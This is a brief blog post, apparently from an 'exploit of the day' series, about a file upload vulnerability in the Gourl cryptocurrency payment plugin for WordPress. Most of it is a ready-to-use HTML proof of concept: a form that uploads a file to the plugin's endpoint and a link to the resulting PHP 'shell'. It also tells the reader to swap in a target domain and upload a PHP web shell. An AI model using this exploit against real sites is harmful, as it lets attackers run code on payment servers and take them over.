A file upload vulnerability has been found affecting a crypto currency payment gateway
Wordpress instances running the Gourl plugin with a version past 1.4.14.
Proof of concept
<html> <body> <form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data"> <input type="file" name="gourlimage2" /> <input type="submit"/> </form> <a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a> </body> </html>
All that is needed is that you replace 127.0.0.1 with your domain
and pick a php web shell to upload.
This blog post is part of the exploit of the day series
where we write a shorter description about interesting
exploits that we index.